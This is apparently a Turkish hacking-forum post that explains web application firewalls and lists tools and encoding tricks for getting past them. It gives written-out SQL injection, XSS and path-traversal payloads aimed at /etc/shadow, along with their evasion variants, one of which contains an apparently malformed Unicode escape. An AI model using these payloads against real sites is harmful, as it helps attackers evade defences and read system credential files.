- 29 Haz 2022
- 161
- 40
![FW5XkUc.png](https://i.imgur.com/FW5XkUc.png)
Merhaba TürkHackTeam Ailesi
WEB uygulama güvenlik duvarı, bir WAF web uygulamasındaki ağ saldırılarını algılamak ve engellemek için tasarlanmış bir dizi monitör ve filtiredir.
![goUm2FK.png](https://i.imgur.com/goUm2FK.png)
WAF kullanmanın nedenleri
- Derinlemesine Savunma yaklaşımı
- Savunmasız web uygulamalarına yönelik saldırıları algılar ve engeller
- Çeşitli güvenlik açıklarına karşı koruma sağlar
- Bir şirketin web ortamını korur.
![lj8Ws4r.png](https://i.imgur.com/lj8Ws4r.png)
Baypas Yapmak İçin Araçlar:
w3af — Web Uygulama Saldırısı ve Denetim Çerçevesi
![8JssNBR.png](https://i.imgur.com/8JssNBR.png)
w3af - Open Source Web Application Security Scanner
wafw00f — Web Uygulaması Güvenlik Duvarını tanımlayın ve parmak izini sürün
wafw00f — Web Uygulaması Güvenlik Duvarını tanımlayın ve parmak izini sürün
![lbyFZl4.png](https://i.imgur.com/lbyFZl4.png)
GitHub - EnableSecurity/wafw00f: WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
CloudFail – Cloudflare WAF'ın arkasındaki orijinal IP adresini bulmaya çalışan taktiksel bir keşif aracıdır.
CloudFail – Cloudflare WAF'ın arkasındaki orijinal IP adresini bulmaya çalışan taktiksel bir keşif aracıdır.
![G2bX7Zk.png](https://i.imgur.com/G2bX7Zk.png)
![goUm2FK.png](https://i.imgur.com/goUm2FK.png)
WAF baypas etme teknikleri: Genel Talep:
SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'
Genel talep dediyim buradan anladımız üzere web sayfasına gönderdimiz talepler böyledir ama bu talepler WAF tarafından engelenir
Bypass Tekniği:
sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'
Gördüyümüz gibi Harifleri Büyük küçük yaparsak, ASCII karakterleri, WAF atlamak için bize harika değişkenler sağlar
Sonuç almak için yükün tamamını veya bir kısmını değişin.
Genel talep:
<marquee onstart=prompt()>
Bypass Tekniği:
<marquee onstart=\u0070r\u06f\u006dpt()>
Genel Talep:
../../etc/shadow
Bypass Tekniği:
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow
![SZDZeP5.png](https://i.imgur.com/SZDZeP5.png)
Bunu unutmayın ki, Birçok web uygulaması, farklı kodlama türlerini destekler ve kodlamayı yorumlabilir, WAF’ın tüm sorunlar için her derde deva olmadığını unutmayın, Her zaman farklı kodlama teknikleri deneyin, bazıları çalışacaktır.
![fbFJM0r.png](https://i.imgur.com/fbFJM0r.png)